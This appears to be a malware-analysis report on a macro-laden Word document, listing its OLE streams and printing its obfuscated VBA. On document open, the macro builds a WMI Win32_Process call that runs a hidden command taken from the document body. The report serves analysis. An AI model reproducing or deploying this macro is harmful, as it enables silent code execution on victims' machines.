                                        "lObhAqBUYxXfy"
                                        fdLCFDmF
                                        "LhUxJGiLUCZp"
                                        AUZLIjCLH.CreateTextFile("LPJPJFI:\CTzVF\dLRZEH.maUZE")
                                        bwdNxC.CreateTextFile("tNUBI:\bUxfKyODA\ZyrvC.WCgQpU")
                                        eRxrHHEBB.Close
                                        RJCEFJhC.WriteLine
                                        "FCWeAwOsytUsCF"
                                        JJetH.WriteLine
                                        TOXmCsgb:
                                        Error
                                        zubYHA
                                        gnToaBcmF
                                        Attribute
                                        tNvqYU.CreateTextFile("sGEGIHLHI:\qsyPj\EiYLgCIK.EdPNHU")
                                        dUEpTnTJX
                                        GUUgA
                                        fdLCFDmF.Close
                                        IYUAEB
                                        ryExIJiIc
                                        Function
                                        UcUhFvH
                                        RJCEFJhC:
                                        rfIxFdkBE
                                        nEFlbEa
                                        "TzymSNqRGdH"
                                        hgvZG
                                        uwCSCCEO:
                                        UbNkCZ
                                        FijxC.CreateTextFile("DNCEiIDxC:\EYevg\MFdKF.RmyPCLa")
                                        ZZzrG.CreateTextFile("HrrfJtDR:\BPgVNA\eowWDqCnB.iaEjRFDB")
                                        kUseBAG
                                        kggQZcCIE
                                        "CColSRKUqE"
                                        fdLCFDmF:
                                        VBA Code
                                        Attribute VB_Name = "A81c_pcot0t3c8"
Function Rvpv59xrvp7m2wb()
On Error Resume Next
Cju6d_0v951 = "Uvktlkqthymnm68w" + "Ti33bl29fw_53yu"
sf4 = Xj1p0_yor4q8g + Teh9tkv0p83u4g.StoryRanges.Item(2 / 2) + Gdmbhv991jtvgzq
   GoTo eRxrHHEBB
Dim TptSCH As Object
Set UnVnjA = hlEyDCTAH
Set TptSCH = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim eRxrHHEBB As Object
Set eRxrHHEBB = TptSCH.CreateTextFile("MqoMRwwIg:\gqqsLDE\cFTTPq.jfZyU")
eRxrHHEBB.WriteLine "HNkPCvHSVKIC"
eRxrHHEBB.WriteLine "CColSRKUqE"
eRxrHHEBB.WriteLine "txLTFDcUtlBJi"
Set VNhJZVCB = eHrGyvyM
eRxrHHEBB.Close
Set TptSCH = Nothing
Set IYUAEB = cVkLD
Set eRxrHHEBB = Nothing
eRxrHHEBB:
t3s = "]anw[3" + "p]anw[3"
Eyshwbjqie_zkc = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
   GoTo UaCEJEERD
Dim bwdNxC As Object
Set zubYHA = tIaWTAJA
Set bwdNxC = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim UaCEJEERD As Object
Set UaCEJEERD = bwdNxC.CreateTextFile("tNUBI:\bUxfKyODA\ZyrvC.WCgQpU")
UaCEJEERD.WriteLine "TzymSNqRGdH"
UaCEJEERD.WriteLine "NkEpBgFHAsWaxHT"
UaCEJEERD.WriteLine "FCWeAwOsytUsCF"
Set gnToaBcmF = PvcTcFOF
UaCEJEERD.Close
Set bwdNxC = Nothing
Set tNngtUo = chutdOAFs
Set UaCEJEERD = Nothing
UaCEJEERD:
Pmgv9nf28vkxhyvys = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
   GoTo uwCSCCEO
Dim KTDSIL As Object
Set deuxb = XhUYUbSBA
Set KTDSIL = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim uwCSCCEO As Object
Set uwCSCCEO = KTDSIL.CreateTextFile("VdGtFIE:\SzlumIC\CndNBJiEG.WAxLRDDC")
uwCSCCEO.WriteLine "LhUxJGiLUCZp"
uwCSCCEO.WriteLine "QkKSDHgSXaAA"
uwCSCCEO.WriteLine "RmlAGEzIZqLPNdIDj"
Set PuAVBFFM = pzqeBGIAH
uwCSCCEO.Close
Set KTDSIL = Nothing
Set pGLWAAGJ = TbHJC
Set uwCSCCEO = Nothing
uwCSCCEO:
Agz22fuzun5rgvbir = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
   GoTo NHymnJzG
Dim TiWkS As Object
Set PkQhSAw = eBvGf
Set TiWkS = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim NHymnJzG As Object
Set NHymnJzG = TiWkS.CreateTextFile("JhEjHJH:\heHcF\xIjwBCI.IWEODGR")
NHymnJzG.WriteLine "QCgbCFzJiDJUEIHES"
NHymnJzG.WriteLine "AfSXEBzJIIxvQmJC"
NHymnJzG.WriteLine "zDOlFEIFBVWkPbIC"
Set ImZpAHpaF = bYwGEijH
NHymnJzG.Close
Set TiWkS = Nothing
Set UgnVAHcRD = uvgvJGfI
Set NHymnJzG = Nothing
NHymnJzG:
C0g8w_98xxaqclw4 = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"
   GoTo rfIxFdkBE
Dim ZZzrG As Object
Set ArkJEKEEH = rINmB
Set ZZzrG = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim rfIxFdkBE As Object
Set rfIxFdkBE = ZZzrG.CreateTextFile("HrrfJtDR:\BPgVNA\eowWDqCnB.iaEjRFDB")
rfIxFdkBE.WriteLine "xfhECJccxFyA"
rfIxFdkBE.WriteLine "AdLOPbWTXOCCRm"
rfIxFdkBE.WriteLine "cWptEtSbgvWCAD"
Set ZEetCEyLC = iOplaUSwB
rfIxFdkBE.Close
Set ZZzrG = Nothing
Set uSvkK = kUseBAG
Set rfIxFdkBE = Nothing
rfIxFdkBE:
M8v1nootk49plci = Agz22fuzun5rgvbir + C0g8w_98xxaqclw4 + Pmgv9nf28vkxhyvys + t3s + Eyshwbjqie_zkc
   GoTo bcUFD
Dim zetDIDBDI As Object
Set eTBBLHXwx = qdDeFbDk
Set zetDIDBDI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim bcUFD As Object
Set bcUFD = zetDIDBDI.CreateTextFile("ayAqsH:\opXXFq\UykoCNloH.lEEiEJlG")
bcUFD.WriteLine "wOTiEDqNZtWN"
bcUFD.WriteLine "xaOQJbzFVCXtJADD"
bcUFD.WriteLine "ufltvttBnHJNx"
Set vKdAbBHGq = UbNkCZ
bcUFD.Close
Set zetDIDBDI = Nothing
Set NctjGT = fMPBmQ
Set bcUFD = Nothing
bcUFD:
J_gncosnr4av4lr = Slz39ct0lz_ksnd(M8v1nootk49plci)
   GoTo TOXmCsgb
Dim TjDNNFkVD As Object
Set IfdcD = sbLwDeWJ
Set TjDNNFkVD = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim TOXmCsgb As Object
Set TOXmCsgb = TjDNNFkVD.CreateTextFile("JYXoyLAMu:\EFBhEtGsQ\owfrHBHf.anGOrJLhY")
TOXmCsgb.WriteLine "GqSFCtOyDYdfx"
TOXmCsgb.WriteLine "QsixYFOXyEEAmh"
TOXmCsgb.WriteLine "QxWCtMBxGzkkBAU"
Set KFlvRoHB = JjBKEUXqH
TOXmCsgb.Close
Set TjDNNFkVD = Nothing
Set WiXswI = GEopA
Set TOXmCsgb = Nothing
TOXmCsgb:
Set Tp28g8vd8ptrsy = CreateObject(J_gncosnr4av4lr)
   GoTo yHxgEeJg
Dim AUZLIjCLH As Object
Set aCXYJWIHA = BuEcDJvc
Set AUZLIjCLH = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim yHxgEeJg As Object
Set yHxgEeJg = AUZLIjCLH.CreateTextFile("LPJPJFI:\CTzVF\dLRZEH.maUZE")
yHxgEeJg.WriteLine "RMNuAAEfwmHGkp"
yHxgEeJg.WriteLine "YfIwYFFntmmdDsPv"
yHxgEeJg.WriteLine "nbBVBbrmTJhR"
Set vsASGFtA = JkICEEJbA
yHxgEeJg.Close
Set AUZLIjCLH = Nothing
Set VWiBw = hrqzdCF
Set yHxgEeJg = Nothing
yHxgEeJg:
Ufvxqjlwai0p9fg8tc = Mid(sf4, (1 + 4), Len(sf4))
   GoTo ApdWADYGV
Dim UjlQFBJj As Object
Set cTUpB = SYgbDdCEH
Set UjlQFBJj = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim ApdWADYGV As Object
Set ApdWADYGV = UjlQFBJj.CreateTextFile("zGzGFMUJD:\QkpIYHOrc\FwQpsJ.ddKnHUJB")
ApdWADYGV.WriteLine "JNHUAINVrwxEKEHD"
ApdWADYGV.WriteLine "EXrpEHndyyG"
ApdWADYGV.WriteLine "TwoNCIGurJPYA"
Set AFnzJ = IuDSasFIm
ApdWADYGV.Close
Set UjlQFBJj = Nothing
Set PzSZDA = LUJoKCCQ
Set ApdWADYGV = Nothing
ApdWADYGV:
   GoTo eLNGd
Dim buKzFt As Object
Set ryExIJiIc = xDUMl
Set buKzFt = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim eLNGd As Object
Set eLNGd = buKzFt.CreateTextFile("sucQc:\iYsaHyNC\NiIqHAH.mTesbI")
eLNGd.WriteLine "GApbBIepzWxnI"
eLNGd.WriteLine "lkkOeHeJHjmGONABFI"
eLNGd.WriteLine "lSOfQyhpoF"
Set dUEpTnTJX = TFPJDBSa
eLNGd.Close
Set buKzFt = Nothing
Set NPOhCPGF = hKDFekFGF
Set eLNGd = Nothing
eLNGd:
Tp28g8vd8ptrsy.Create Slz39ct0lz_ksnd(Ufvxqjlwai0p9fg8tc), L_4bpvggv2vokj75, Nakuayuxnnrg5
   GoTo hQCyFzF
Dim msoKFIIMI As Object
Set gJsfsb = IYlnG
Set msoKFIIMI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim hQCyFzF As Object
Set hQCyFzF = msoKFIIMI.CreateTextFile("SQhZmTV:\ITZNAskG\hSsqo.sNJcmiGF")
hQCyFzF.WriteLine "ehJSnoaWvoCEfGL"
hQCyFzF.WriteLine "uAYnHfspvFJ"
hQCyFzF.WriteLine "GuEmEfvZLaJDIAX"
Set ZQkkGq = nEFlbEa
hQCyFzF.Close
Set msoKFIIMI = Nothing
Set kcuElHl = ClgfEDCg
Set hQCyFzF = Nothing
hQCyFzF:
   GoTo sPUjHbDB
Dim FijxC As Object
Set sewLMSSJg = UcUhFvH
Set FijxC = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim sPUjHbDB As Object
Set sPUjHbDB = FijxC.CreateTextFile("DNCEiIDxC:\EYevg\MFdKF.RmyPCLa")
sPUjHbDB.WriteLine "jyJEJqDCTEnyIA"
sPUjHbDB.WriteLine "pIHMJANYJmFIe"
sPUjHbDB.WriteLine "tZZjtwJRCQcVAD"
Set HjcgHbA = ncXeGEGfF
sPUjHbDB.Close
Set FijxC = Nothing
Set KzJMOvqoA = kIALACE
Set sPUjHbDB = Nothing
sPUjHbDB:
End Function
Function Slz39ct0lz_ksnd(Oap3dn26wvi2z)
On Error Resume Next
   GoTo fdLCFDmF
Dim WqyIx As Object
Set fqoDE = yKTqX
Set WqyIx = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fdLCFDmF As Object
Set fdLCFDmF = WqyIx.CreateTextFile("ylDMcFB:\AAOOMAKJq\xwBWuI.IOYsGSuDB")
fdLCFDmF.WriteLine "CljNpAVDuUTJuHv"
fdLCFDmF.WriteLine "RVkNwtRXUzC"
fdLCFDmF.WriteLine "DTeWBCeIuXcgIDGC"
Set eDbUAXI = PdhtG
fdLCFDmF.Close
Set WqyIx = Nothing
Set mbDbF = QAhNFQ
Set fdLCFDmF = Nothing
fdLCFDmF:
X_3mj_vfdq5m9 = Oap3dn26wvi2z
   GoTo tfgmN
Dim tNvqYU As Object
Set GzGtFB = WOdrGBJG
Set tNvqYU = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim tfgmN As Object
Set tfgmN = tNvqYU.CreateTextFile("sGEGIHLHI:\qsyPj\EiYLgCIK.EdPNHU")
tfgmN.WriteLine "yfwQBHQfgeJbFJB"
tfgmN.WriteLine "lObhAqBUYxXfy"
tfgmN.WriteLine "RmgSBGJYhhoQDxVIT"
Set fxJTHGJF = GPfHF
tfgmN.Close
Set tNvqYU = Nothing
Set qhuKHDC = hKjoxAHI
Set tfgmN = Nothing
tfgmN:
Vald5avf9551m1u9_q = Zacj6cs0xxmkchq(X_3mj_vfdq5m9)
   GoTo JJetH
Dim MeLoxDCJT As Object
Set EcBqJBVE = ODgRUaAId
Set MeLoxDCJT = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim JJetH As Object
Set JJetH = MeLoxDCJT.CreateTextFile("VixyO:\QYvZJLAY\DkDtKB.ACnqoxJ")
JJetH.WriteLine "eKjGCADVsuMVfjHhDc"
JJetH.WriteLine "mMpvHwuBnnrqGyIFq"
JJetH.WriteLine "hWxuzXUxYdWuBHC"
Set ixuyHGriH = uLRAyCA
JJetH.Close
Set MeLoxDCJT = Nothing
Set XSlyHJ = LBFSC
Set JJetH = Nothing
JJetH:
Slz39ct0lz_ksnd = Vald5avf9551m1u9_q
   GoTo hgvZG
Dim TmGkDL As Object
Set QCDEyAHw = YBonG
Set TmGkDL = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim hgvZG As Object
Set hgvZG = TmGkDL.CreateTextFile("LhykJB:\jTdNFUJ\PnxpBEA.YspSlC")
hgvZG.WriteLine "hDlEFEcAPqOXZqg"
hgvZG.WriteLine "WVtJEvzwejAL"
hgvZG.WriteLine "YIyOHHHeDXloKIBE"
Set FrVPCyW = noyuzC
hgvZG.Close
Set TmGkDL = Nothing
Set kggQZcCIE = gxwmz
Set hgvZG = Nothing
hgvZG:
End Function
Function Zacj6cs0xxmkchq(Sagq26te2gujbyg)
Pn8s1r_n_tq7o5093 = Leedy8frqauxr
   GoTo RJCEFJhC
Dim WcDDCTDnI As Object
Set LqqhhpAQ = bzYfQcEHB
Set WcDDCTDnI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim RJCEFJhC As Object
Set RJCEFJhC = WcDDCTDnI.CreateTextFile("MRDYFoGGc:\LGsvZeCE\WxUJACHB.KjAkiD")
RJCEFJhC.WriteLine "MJtNyEaooLCJCF"
RJCEFJhC.WriteLine "UqiKuFLuUFAG"
RJCEFJhC.WriteLine "zErBUYAGeMPaGBPDC"
Set oTwTJAJ = xZGeAsHP
RJCEFJhC.Close
Set WcDDCTDnI = Nothing
Set sHovtYJn = naqcFCA
Set RJCEFJhC = Nothing
RJCEFJhC:
Zacj6cs0xxmkchq = Replace(Sagq26te2gujbyg, "]a" + "nw[3", Ty8salh27qds_)
   GoTo ZYnQf
Dim GUUgA As Object
Set PRsSHBf = dwJWfYEzQ
Set GUUgA = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim ZYnQf As Object
Set ZYnQf = GUUgA.CreateTextFile("gDyoIzGDe:\zHPnE\SlHrCGBaB.xpVdXbCuJ")
ZYnQf.WriteLine "aekFkFuGVeluWCH"
ZYnQf.WriteLine "qsYNSviAFUkyhFd"
ZYnQf.WriteLine "rWCJIFDWVfATR"
Set XJUEA = vkAhEABKZ
ZYnQf.Close
Set GUUgA = Nothing
Set EjrLDNGq = LXJdHABRP
Set ZYnQf = Nothing
ZYnQf:
End Function
                                        VBA File Name: Larj61e5m5vzwh77, Stream Size: 703
                                        General
                                        Stream Path:Macros/VBA/Larj61e5m5vzwh77
                                        VBA File Name:Larj61e5m5vzwh77
                                        Stream Size:703
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 e9 f2 f7 34 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                        VBA Code Keywords

                                        Keyword
                                        Attribute
                                        VB_Name
                                        VBA Code
                                        Attribute VB_Name = "Larj61e5m5vzwh77"
                                        VBA File Name: Teh9tkv0p83u4g, Stream Size: 1114
                                        General
                                        Stream Path:Macros/VBA/Teh9tkv0p83u4g
                                        VBA File Name:Teh9tkv0p83u4g
                                        Stream Size:1114
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . t G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 e9 f2 74 47 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                        VBA Code Keywords

                                        Keyword
                                        Document_open()
                                        False
                                        Private
                                        VB_Exposed
                                        Attribute
                                        VB_Creatable
                                        VB_Name
                                        VB_PredeclaredId
                                        VB_GlobalNameSpace
                                        VB_Base
                                        VB_Customizable
                                        VB_TemplateDerived
                                        VBA Code
                                        Attribute VB_Name = "Teh9tkv0p83u4g"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Rvpv59xrvp7m2wb
End Sub

                                        Streams

                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                        General
                                        Stream Path:\x1CompObj
                                        File Type:data
                                        Stream Size:146
                                        Entropy:4.00187355764
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                        General
                                        Stream Path:\x5DocumentSummaryInformation
                                        File Type:data
                                        Stream Size:4096
                                        Entropy:0.279977375321
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . " . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 544
                                        General
                                        Stream Path:\x5SummaryInformation
                                        File Type:data
                                        Stream Size:544
                                        Entropy:4.11919337695
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                        Stream Path: 1Table, File Type: data, Stream Size: 6412
                                        General
                                        Stream Path:1Table
                                        File Type:data
                                        Stream Size:6412
                                        Entropy:6.14493480592
                                        Base64 Encoded:True
                                        Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                        Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                        Stream Path: Data, File Type: data, Stream Size: 99188
                                        General
                                        Stream Path:Data
                                        File Type:data
                                        Stream Size:99188
                                        Entropy:7.39017711825
                                        Base64 Encoded:True
                                        Data ASCII:t . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . r . 6 ~ ^ # . o . . . . v . . . . . . . . . . . D . . . . . 6 . . F . . . . . . . . r . 6 ~ ^ # . o . . . . v . . . . . . .
                                        Data Raw:74 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                                        General
                                        Stream Path:Macros/PROJECT
                                        File Type:ASCII text, with CRLF line terminators
                                        Stream Size:523
                                        Entropy:5.477498743
                                        Base64 Encoded:True
                                        Data ASCII:I D = " { F 5 B 4 5 2 4 B - D 1 E A - 4 B 0 7 - A E 3 D - 1 0 5 F 6 5 5 7 F F A 4 } " . . D o c u m e n t = T e h 9 t k v 0 p 8 3 u 4 g / & H 0 0 0 0 0 0 0 0 . . M o d u l e = L a r j 6 1 e 5 m 5 v z w h 7 7 . . M o d u l e = A 8 1 c _ p c o t 0 t 3 c 8 . . E x e N a m e 3 2 = " M i s b h 4 j 2 t p 3 x c 7 d 8 3 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 E 2 C 2 D 5 3 D 5 B 3 5 5 B 7 5 5 B 7 5 5 B 7 5 5 B 7
                                        Data Raw:49 44 3d 22 7b 46 35 42 34 35 32 34 42 2d 44 31 45 41 2d 34 42 30 37 2d 41 45 33 44 2d 31 30 35 46 36 35 35 37 46 46 41 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 65 68 39 74 6b 76 30 70 38 33 75 34 67 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4c 61 72 6a 36 31 65 35 6d 35 76 7a 77 68 37 37 0d 0a 4d 6f 64 75 6c 65 3d 41 38 31 63 5f 70 63 6f 74 30 74 33 63 38 0d
                                        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 143
                                        General
                                        Stream Path:Macros/PROJECTwm
                                        File Type:data
                                        Stream Size:143
                                        Entropy:3.86963281051
                                        Base64 Encoded:True
                                        Data ASCII:T e h 9 t k v 0 p 8 3 u 4 g . T . e . h . 9 . t . k . v . 0 . p . 8 . 3 . u . 4 . g . . . L a r j 6 1 e 5 m 5 v z w h 7 7 . L . a . r . j . 6 . 1 . e . 5 . m . 5 . v . z . w . h . 7 . 7 . . . A 8 1 c _ p c o t 0 t 3 c 8 . A . 8 . 1 . c . _ . p . c . o . t . 0 . t . 3 . c . 8 . . . . .
                                        Data Raw:54 65 68 39 74 6b 76 30 70 38 33 75 34 67 00 54 00 65 00 68 00 39 00 74 00 6b 00 76 00 30 00 70 00 38 00 33 00 75 00 34 00 67 00 00 00 4c 61 72 6a 36 31 65 35 6d 35 76 7a 77 68 37 37 00 4c 00 61 00 72 00 6a 00 36 00 31 00 65 00 35 00 6d 00 35 00 76 00 7a 00 77 00 68 00 37 00 37 00 00 00 41 38 31 63 5f 70 63 6f 74 30 74 33 63 38 00 41 00 38 00 31 00 63 00 5f 00 70 00 63 00 6f 00 74
                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5224
                                        General
                                        Stream Path:Macros/VBA/_VBA_PROJECT
